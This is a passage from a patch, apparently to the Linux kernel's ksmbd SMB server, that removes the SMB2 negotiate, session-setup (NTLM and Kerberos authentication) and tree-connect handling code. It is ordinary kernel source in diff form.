+-		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+-			if (conn->preauth_info->Preauth_HashId)
+-				break;
+-
+-			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx,
+-						     ctxt_len);
+-			if (status != STATUS_SUCCESS)
+-				break;
+-		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-			if (conn->cipher_type)
+-				break;
+-
+-			decode_encrypt_ctxt(conn,
+-					    (struct smb2_encryption_neg_context *)pctx,
+-					    ctxt_len);
+-		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-			if (conn->compress_algorithm)
+-				break;
+-
+-			decode_compress_ctxt(conn,
+-					     (struct smb2_compression_capabilities_context *)pctx);
+-		} else if (pctx->ContextType == SMB2_NETNAME_NEGOTIATE_CONTEXT_ID) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_NETNAME_NEGOTIATE_CONTEXT_ID context\n");
+-		} else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-			conn->posix_ext_supported = true;
+-		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
+-			ksmbd_debug(SMB,
+-				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
+-
+-			decode_sign_cap_ctxt(conn,
+-					     (struct smb2_signing_capabilities *)pctx,
+-					     ctxt_len);
+-		}
+-
+-		/* offsets must be 8 byte aligned */
+-		offset = (ctxt_len + 7) & ~0x7;
+-		len_of_ctxts -= offset;
+-	}
+-	return status;
+-}
+-
+-/**
+- * smb2_handle_negotiate() - handler for smb2 negotiate command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0
+- */
+-int smb2_handle_negotiate(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
+-	int rc = 0;
+-	unsigned int smb2_buf_len, smb2_neg_size;
+-	__le32 status;
+-
+-	ksmbd_debug(SMB, "Received negotiate request\n");
+-	conn->need_neg = false;
+-	if (ksmbd_conn_good(conn)) {
+-		pr_err("conn->tcp_status is already in CifsGood State\n");
+-		work->send_no_response = 1;
+-		return rc;
+-	}
+-
+-	smb2_buf_len = get_rfc1002_len(work->request_buf);
+-	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
+-	if (smb2_neg_size > smb2_buf_len) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (req->DialectCount == 0) {
+-		pr_err("malformed packet\n");
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (conn->dialect == SMB311_PROT_ID) {
+-		unsigned int nego_ctxt_off = le32_to_cpu(req->NegotiateContextOffset);
+-
+-		if (smb2_buf_len < nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-
+-		if (smb2_neg_size > nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    nego_ctxt_off) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-	} else {
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    smb2_buf_len) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			rc = -EINVAL;
+-			goto err_out;
+-		}
+-	}
+-
+-	conn->cli_cap = le32_to_cpu(req->Capabilities);
+-	switch (conn->dialect) {
+-	case SMB311_PROT_ID:
+-		conn->preauth_info =
+-			kzalloc(sizeof(struct preauth_integrity_info),
+-				GFP_KERNEL);
+-		if (!conn->preauth_info) {
+-			rc = -ENOMEM;
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			goto err_out;
+-		}
+-
+-		status = deassemble_neg_contexts(conn, req,
+-						 get_rfc1002_len(work->request_buf));
+-		if (status != STATUS_SUCCESS) {
+-			pr_err("deassemble_neg_contexts error(0x%x)\n",
+-			       status);
+-			rsp->hdr.Status = status;
+-			rc = -EINVAL;
+-			kfree(conn->preauth_info);
+-			conn->preauth_info = NULL;
+-			goto err_out;
+-		}
+-
+-		rc = init_smb3_11_server(conn);
+-		if (rc < 0) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			kfree(conn->preauth_info);
+-			conn->preauth_info = NULL;
+-			goto err_out;
+-		}
+-
+-		ksmbd_gen_preauth_integrity_hash(conn,
+-						 work->request_buf,
+-						 conn->preauth_info->Preauth_HashValue);
+-		rsp->NegotiateContextOffset =
+-				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
+-		assemble_neg_contexts(conn, rsp, work->response_buf);
+-		break;
+-	case SMB302_PROT_ID:
+-		init_smb3_02_server(conn);
+-		break;
+-	case SMB30_PROT_ID:
+-		init_smb3_0_server(conn);
+-		break;
+-	case SMB21_PROT_ID:
+-		init_smb2_1_server(conn);
+-		break;
+-	case SMB2X_PROT_ID:
+-	case BAD_PROT_ID:
+-	default:
+-		ksmbd_debug(SMB, "Server dialect :0x%x not supported\n",
+-			    conn->dialect);
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		rc = -EINVAL;
+-		goto err_out;
+-	}
+-	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-
+-	/* For stats */
+-	conn->connection_type = conn->dialect;
+-
+-	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
+-	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
+-	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
+-
+-	memcpy(conn->ClientGUID, req->ClientGUID,
+-			SMB2_CLIENT_GUID_SIZE);
+-	conn->cli_sec_mode = le16_to_cpu(req->SecurityMode);
+-
+-	rsp->StructureSize = cpu_to_le16(65);
+-	rsp->DialectRevision = cpu_to_le16(conn->dialect);
+-	/* Not setting conn guid rsp->ServerGUID, as it
+-	 * not used by client for identifying server
+-	 */
+-	memset(rsp->ServerGUID, 0, SMB2_CLIENT_GUID_SIZE);
+-
+-	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
+-	rsp->ServerStartTime = 0;
+-	ksmbd_debug(SMB, "negotiate context offset %d, count %d\n",
+-		    le32_to_cpu(rsp->NegotiateContextOffset),
+-		    le16_to_cpu(rsp->NegotiateContextCount));
+-
+-	rsp->SecurityBufferOffset = cpu_to_le16(128);
+-	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+-	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+-				  le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			 AUTH_GSS_LENGTH);
+-	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+-	conn->use_spnego = true;
+-
+-	if ((server_conf.signing == KSMBD_CONFIG_OPT_AUTO ||
+-	     server_conf.signing == KSMBD_CONFIG_OPT_DISABLED) &&
+-	    req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED_LE)
+-		conn->sign = true;
+-	else if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY) {
+-		server_conf.enforced_signing = true;
+-		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+-		conn->sign = true;
+-	}
+-
+-	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(conn);
+-
+-err_out:
+-	if (rc < 0)
+-		smb2_set_err_rsp(work);
+-
+-	return rc;
+-}
+-
+-static int alloc_preauth_hash(struct ksmbd_session *sess,
+-			      struct ksmbd_conn *conn)
+-{
+-	if (sess->Preauth_HashValue)
+-		return 0;
+-
+-	sess->Preauth_HashValue = kmemdup(conn->preauth_info->Preauth_HashValue,
+-					  PREAUTH_HASHVALUE_SIZE, GFP_KERNEL);
+-	if (!sess->Preauth_HashValue)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+-static int generate_preauth_hash(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	u8 *preauth_hash;
+-
+-	if (conn->dialect != SMB311_PROT_ID)
+-		return 0;
+-
+-	if (conn->binding) {
+-		struct preauth_session *preauth_sess;
+-
+-		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-		if (!preauth_sess) {
+-			preauth_sess = ksmbd_preauth_session_alloc(conn, sess->id);
+-			if (!preauth_sess)
+-				return -ENOMEM;
+-		}
+-
+-		preauth_hash = preauth_sess->Preauth_HashValue;
+-	} else {
+-		if (!sess->Preauth_HashValue)
+-			if (alloc_preauth_hash(sess, conn))
+-				return -ENOMEM;
+-		preauth_hash = sess->Preauth_HashValue;
+-	}
+-
+-	ksmbd_gen_preauth_integrity_hash(conn, work->request_buf, preauth_hash);
+-	return 0;
+-}
+-
+-static int decode_negotiation_token(struct ksmbd_conn *conn,
+-				    struct negotiate_message *negblob,
+-				    size_t sz)
+-{
+-	if (!conn->use_spnego)
+-		return -EINVAL;
+-
+-	if (ksmbd_decode_negTokenInit((char *)negblob, sz, conn)) {
+-		if (ksmbd_decode_negTokenTarg((char *)negblob, sz, conn)) {
+-			conn->auth_mechs |= KSMBD_AUTH_NTLMSSP;
+-			conn->preferred_auth_mech = KSMBD_AUTH_NTLMSSP;
+-			conn->use_spnego = false;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int ntlm_negotiate(struct ksmbd_work *work,
+-			  struct negotiate_message *negblob,
+-			  size_t negblob_len)
+-{
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct challenge_message *chgblob;
+-	unsigned char *spnego_blob = NULL;
+-	u16 spnego_blob_len;
+-	char *neg_blob;
+-	int sz, rc;
+-
+-	ksmbd_debug(SMB, "negotiate phase\n");
+-	rc = ksmbd_decode_ntlmssp_neg_blob(negblob, negblob_len, work->conn);
+-	if (rc)
+-		return rc;
+-
+-	sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-	chgblob =
+-		(struct challenge_message *)((char *)&rsp->hdr.ProtocolId + sz);
+-	memset(chgblob, 0, sizeof(struct challenge_message));
+-
+-	if (!work->conn->use_spnego) {
+-		sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
+-		if (sz < 0)
+-			return -ENOMEM;
+-
+-		rsp->SecurityBufferLength = cpu_to_le16(sz);
+-		return 0;
+-	}
+-
+-	sz = sizeof(struct challenge_message);
+-	sz += (strlen(ksmbd_netbios_name()) * 2 + 1 + 4) * 6;
+-
+-	neg_blob = kzalloc(sz, GFP_KERNEL);
+-	if (!neg_blob)
+-		return -ENOMEM;
+-
+-	chgblob = (struct challenge_message *)neg_blob;
+-	sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
+-	if (sz < 0) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	rc = build_spnego_ntlmssp_neg_blob(&spnego_blob, &spnego_blob_len,
+-					   neg_blob, sz);
+-	if (rc) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-	memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+-	rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+-
+-out:
+-	kfree(spnego_blob);
+-	kfree(neg_blob);
+-	return rc;
+-}
+-
+-static struct authenticate_message *user_authblob(struct ksmbd_conn *conn,
+-						  struct smb2_sess_setup_req *req)
+-{
+-	int sz;
+-
+-	if (conn->use_spnego && conn->mechToken)
+-		return (struct authenticate_message *)conn->mechToken;
+-
+-	sz = le16_to_cpu(req->SecurityBufferOffset);
+-	return (struct authenticate_message *)((char *)&req->hdr.ProtocolId
+-					       + sz);
+-}
+-
+-static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+-				       struct smb2_sess_setup_req *req)
+-{
+-	struct authenticate_message *authblob;
+-	struct ksmbd_user *user;
+-	char *name;
+-	unsigned int name_off, name_len, secbuf_len;
+-
+-	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (secbuf_len < sizeof(struct authenticate_message)) {
+-		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
+-		return NULL;
+-	}
+-	authblob = user_authblob(conn, req);
+-	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
+-	name_len = le16_to_cpu(authblob->UserName.Length);
+-
+-	if (secbuf_len < (u64)name_off + name_len)
+-		return NULL;
+-
+-	name = smb_strndup_from_utf16((const char *)authblob + name_off,
+-				      name_len,
+-				      true,
+-				      conn->local_nls);
+-	if (IS_ERR(name)) {
+-		pr_err("cannot allocate memory\n");
+-		return NULL;
+-	}
+-
+-	ksmbd_debug(SMB, "session setup request for user %s\n", name);
+-	user = ksmbd_login_user(name);
+-	kfree(name);
+-	return user;
+-}
+-
+-static int ntlm_authenticate(struct ksmbd_work *work)
+-{
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct channel *chann = NULL;
+-	struct ksmbd_user *user;
+-	u64 prev_id;
+-	int sz, rc;
+-
+-	ksmbd_debug(SMB, "authenticate phase\n");
+-	if (conn->use_spnego) {
+-		unsigned char *spnego_blob;
+-		u16 spnego_blob_len;
+-
+-		rc = build_spnego_ntlmssp_auth_blob(&spnego_blob,
+-						    &spnego_blob_len,
+-						    0);
+-		if (rc)
+-			return -ENOMEM;
+-
+-		sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+-		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+-		kfree(spnego_blob);
+-		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
+-	}
+-
+-	user = session_user(conn, req);
+-	if (!user) {
+-		ksmbd_debug(SMB, "Unknown user name or an error\n");
+-		return -EPERM;
+-	}
+-
+-	/* Check for previous session */
+-	prev_id = le64_to_cpu(req->PreviousSessionId);
+-	if (prev_id && prev_id != sess->id)
+-		destroy_previous_session(conn, user, prev_id);
+-
+-	if (sess->state == SMB2_SESSION_VALID) {
+-		/*
+-		 * Reuse session if anonymous try to connect
+-		 * on reauthetication.
+-		 */
+-		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+-			ksmbd_free_user(user);
+-			return 0;
+-		}
+-
+-		if (!ksmbd_compare_user(sess->user, user)) {
+-			ksmbd_free_user(user);
+-			return -EPERM;
+-		}
+-		ksmbd_free_user(user);
+-	} else {
+-		sess->user = user;
+-	}
+-
+-	if (conn->binding == false && user_guest(sess->user)) {
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+-	} else {
+-		struct authenticate_message *authblob;
+-
+-		authblob = user_authblob(conn, req);
+-		sz = le16_to_cpu(req->SecurityBufferLength);
+-		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
+-		if (rc) {
+-			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
+-			ksmbd_debug(SMB, "authentication failed\n");
+-			return -EPERM;
+-		}
+-	}
+-
+-	/*
+-	 * If session state is SMB2_SESSION_VALID, We can assume
+-	 * that it is reauthentication. And the user/password
+-	 * has been verified, so return it here.
+-	 */
+-	if (sess->state == SMB2_SESSION_VALID) {
+-		if (conn->binding)
+-			goto binding_session;
+-		return 0;
+-	}
+-
+-	if ((rsp->SessionFlags != SMB2_SESSION_FLAG_IS_GUEST_LE &&
+-	     (conn->sign || server_conf.enforced_signing)) ||
+-	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+-		sess->sign = true;
+-
+-	if (smb3_encryption_negotiated(conn) &&
+-			!(req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
+-		rc = conn->ops->generate_encryptionkey(conn, sess);
+-		if (rc) {
+-			ksmbd_debug(SMB,
+-					"SMB3 encryption key generation failed\n");
+-			return -EINVAL;
+-		}
+-		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+-		/*
+-		 * signing is disable if encryption is enable
+-		 * on this session
+-		 */
+-		sess->sign = false;
+-	}
+-
+-binding_session:
+-	if (conn->dialect >= SMB30_PROT_ID) {
+-		chann = lookup_chann_list(sess, conn);
+-		if (!chann) {
+-			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+-			if (!chann)
+-				return -ENOMEM;
+-
+-			chann->conn = conn;
+-			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+-		}
+-	}
+-
+-	if (conn->ops->generate_signingkey) {
+-		rc = conn->ops->generate_signingkey(sess, conn);
+-		if (rc) {
+-			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ksmbd_conn_lookup_dialect(conn)) {
+-		pr_err("fail to verify the dialect\n");
+-		return -ENOENT;
+-	}
+-	return 0;
+-}
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-static int krb5_authenticate(struct ksmbd_work *work)
+-{
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	char *in_blob, *out_blob;
+-	struct channel *chann = NULL;
+-	u64 prev_sess_id;
+-	int in_len, out_len;
+-	int retval;
+-
+-	in_blob = (char *)&req->hdr.ProtocolId +
+-		le16_to_cpu(req->SecurityBufferOffset);
+-	in_len = le16_to_cpu(req->SecurityBufferLength);
+-	out_blob = (char *)&rsp->hdr.ProtocolId +
+-		le16_to_cpu(rsp->SecurityBufferOffset);
+-	out_len = work->response_sz -
+-		(le16_to_cpu(rsp->SecurityBufferOffset) + 4);
+-
+-	/* Check previous session */
+-	prev_sess_id = le64_to_cpu(req->PreviousSessionId);
+-	if (prev_sess_id && prev_sess_id != sess->id)
+-		destroy_previous_session(conn, sess->user, prev_sess_id);
+-
+-	if (sess->state == SMB2_SESSION_VALID)
+-		ksmbd_free_user(sess->user);
+-
+-	retval = ksmbd_krb5_authenticate(sess, in_blob, in_len,
+-					 out_blob, &out_len);
+-	if (retval) {
+-		ksmbd_debug(SMB, "krb5 authentication failed\n");
+-		return -EINVAL;
+-	}
+-	rsp->SecurityBufferLength = cpu_to_le16(out_len);
+-	inc_rfc1001_len(work->response_buf, out_len - 1);
+-
+-	if ((conn->sign || server_conf.enforced_signing) ||
+-	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+-		sess->sign = true;
+-
+-	if (smb3_encryption_negotiated(conn)) {
+-		retval = conn->ops->generate_encryptionkey(conn, sess);
+-		if (retval) {
+-			ksmbd_debug(SMB,
+-				    "SMB3 encryption key generation failed\n");
+-			return -EINVAL;
+-		}
+-		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+-		sess->sign = false;
+-	}
+-
+-	if (conn->dialect >= SMB30_PROT_ID) {
+-		chann = lookup_chann_list(sess, conn);
+-		if (!chann) {
+-			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+-			if (!chann)
+-				return -ENOMEM;
+-
+-			chann->conn = conn;
+-			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+-		}
+-	}
+-
+-	if (conn->ops->generate_signingkey) {
+-		retval = conn->ops->generate_signingkey(sess, conn);
+-		if (retval) {
+-			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ksmbd_conn_lookup_dialect(conn)) {
+-		pr_err("fail to verify the dialect\n");
+-		return -ENOENT;
+-	}
+-	return 0;
+-}
+-#else
+-static int krb5_authenticate(struct ksmbd_work *work)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif
+-
+-int smb2_sess_setup(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess;
+-	struct negotiate_message *negblob;
+-	unsigned int negblob_len, negblob_off;
+-	int rc = 0;
+-
+-	ksmbd_debug(SMB, "Received request for session setup\n");
+-
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->SessionFlags = 0;
+-	rsp->SecurityBufferOffset = cpu_to_le16(72);
+-	rsp->SecurityBufferLength = 0;
+-	inc_rfc1001_len(work->response_buf, 9);
+-
+-	ksmbd_conn_lock(conn);
+-	if (!req->hdr.SessionId) {
+-		sess = ksmbd_smb2_session_create();
+-		if (!sess) {
+-			rc = -ENOMEM;
+-			goto out_err;
+-		}
+-		rsp->hdr.SessionId = cpu_to_le64(sess->id);
+-		rc = ksmbd_session_register(conn, sess);
+-		if (rc)
+-			goto out_err;
+-	} else if (conn->dialect >= SMB30_PROT_ID &&
+-		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+-		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
+-		u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-		sess = ksmbd_session_lookup_slowpath(sess_id);
+-		if (!sess) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (conn->dialect != sess->dialect) {
+-			rc = -EINVAL;
+-			goto out_err;
+-		}
+-
+-		if (!(req->hdr.Flags & SMB2_FLAGS_SIGNED)) {
+-			rc = -EINVAL;
+-			goto out_err;
+-		}
+-
+-		if (strncmp(conn->ClientGUID, sess->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE)) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_IN_PROGRESS) {
+-			rc = -EACCES;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_EXPIRED) {
+-			rc = -EFAULT;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_conn_need_reconnect(conn)) {
+-			rc = -EFAULT;
+-			sess = NULL;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_session_lookup(conn, sess_id)) {
+-			rc = -EACCES;
+-			goto out_err;
+-		}
+-
+-		if (user_guest(sess->user)) {
+-			rc = -EOPNOTSUPP;
+-			goto out_err;
+-		}
+-
+-		conn->binding = true;
+-	} else if ((conn->dialect < SMB30_PROT_ID ||
+-		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+-		   (req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
+-		sess = NULL;
+-		rc = -EACCES;
+-		goto out_err;
+-	} else {
+-		sess = ksmbd_session_lookup(conn,
+-					    le64_to_cpu(req->hdr.SessionId));
+-		if (!sess) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_EXPIRED) {
+-			rc = -EFAULT;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_conn_need_reconnect(conn)) {
+-			rc = -EFAULT;
+-			sess = NULL;
+-			goto out_err;
+-		}
+-	}
+-	work->sess = sess;
+-
+-	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+-	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+-	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
+-		rc = -EINVAL;
+-		goto out_err;
+-	}
+-
+-	negblob = (struct negotiate_message *)((char *)&req->hdr.ProtocolId +
+-			negblob_off);
+-
+-	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
+-		if (conn->mechToken)
+-			negblob = (struct negotiate_message *)conn->mechToken;
+-	}
+-
+-	if (server_conf.auth_mechs & conn->auth_mechs) {
+-		rc = generate_preauth_hash(work);
+-		if (rc)
+-			goto out_err;
+-
+-		if (conn->preferred_auth_mech &
+-				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
+-			rc = krb5_authenticate(work);
+-			if (rc) {
+-				rc = -EINVAL;
+-				goto out_err;
+-			}
+-
+-			if (!ksmbd_conn_need_reconnect(conn)) {
+-				ksmbd_conn_set_good(conn);
+-				sess->state = SMB2_SESSION_VALID;
+-			}
+-			kfree(sess->Preauth_HashValue);
+-			sess->Preauth_HashValue = NULL;
+-		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+-			if (negblob->MessageType == NtLmNegotiate) {
+-				rc = ntlm_negotiate(work, negblob, negblob_len);
+-				if (rc)
+-					goto out_err;
+-				rsp->hdr.Status =
+-					STATUS_MORE_PROCESSING_REQUIRED;
+-				/*
+-				 * Note: here total size -1 is done as an
+-				 * adjustment for 0 size blob
+-				 */
+-				inc_rfc1001_len(work->response_buf,
+-						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+-
+-			} else if (negblob->MessageType == NtLmAuthenticate) {
+-				rc = ntlm_authenticate(work);
+-				if (rc)
+-					goto out_err;
+-
+-				if (!ksmbd_conn_need_reconnect(conn)) {
+-					ksmbd_conn_set_good(conn);
+-					sess->state = SMB2_SESSION_VALID;
+-				}
+-				if (conn->binding) {
+-					struct preauth_session *preauth_sess;
+-
+-					preauth_sess =
+-						ksmbd_preauth_session_lookup(conn, sess->id);
+-					if (preauth_sess) {
+-						list_del(&preauth_sess->preauth_entry);
+-						kfree(preauth_sess);
+-					}
+-				}
+-				kfree(sess->Preauth_HashValue);
+-				sess->Preauth_HashValue = NULL;
+-			} else {
+-				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
+-						le32_to_cpu(negblob->MessageType));
+-				rc = -EINVAL;
+-			}
+-		} else {
+-			/* TODO: need one more negotiation */
+-			pr_err("Not support the preferred authentication\n");
+-			rc = -EINVAL;
+-		}
+-	} else {
+-		pr_err("Not support authentication\n");
+-		rc = -EINVAL;
+-	}
+-
+-out_err:
+-	if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
+-	else if (rc == -EACCES)
+-		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
+-	else if (rc == -EFAULT)
+-		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+-	else if (rc == -ENOMEM)
+-		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-	else if (rc == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-	else if (rc)
+-		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+-
+-	if (conn->use_spnego && conn->mechToken) {
+-		kfree(conn->mechToken);
+-		conn->mechToken = NULL;
+-	}
+-
+-	if (rc < 0) {
+-		/*
+-		 * SecurityBufferOffset should be set to zero
+-		 * in session setup error response.
+-		 */
+-		rsp->SecurityBufferOffset = 0;
+-
+-		if (sess) {
+-			bool try_delay = false;
+-
+-			/*
+-			 * To avoid dictionary attacks (repeated session setups rapidly sent) to
+-			 * connect to server, ksmbd make a delay of a 5 seconds on session setup
+-			 * failure to make it harder to send enough random connection requests
+-			 * to break into a server.
+-			 */
+-			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+-				try_delay = true;
+-
+-			sess->last_active = jiffies;
+-			sess->state = SMB2_SESSION_EXPIRED;
+-			if (try_delay) {
+-				ksmbd_conn_set_need_reconnect(conn);
+-				ssleep(5);
+-				ksmbd_conn_set_need_negotiate(conn);
+-			}
+-		}
+-	}
+-
+-	ksmbd_conn_unlock(conn);
+-	return rc;
+-}
+-
+-/**
+- * smb2_tree_connect() - handler for smb2 tree connect command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_tree_connect(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
+-	char *treename = NULL, *name = NULL;
+-	struct ksmbd_tree_conn_status status;
+-	struct ksmbd_share_config *share;
+-	int rc = -EINVAL;
+-
+-	treename = smb_strndup_from_utf16(req->Buffer,
+-					  le16_to_cpu(req->PathLength), true,
+-					  conn->local_nls);
+-	if (IS_ERR(treename)) {
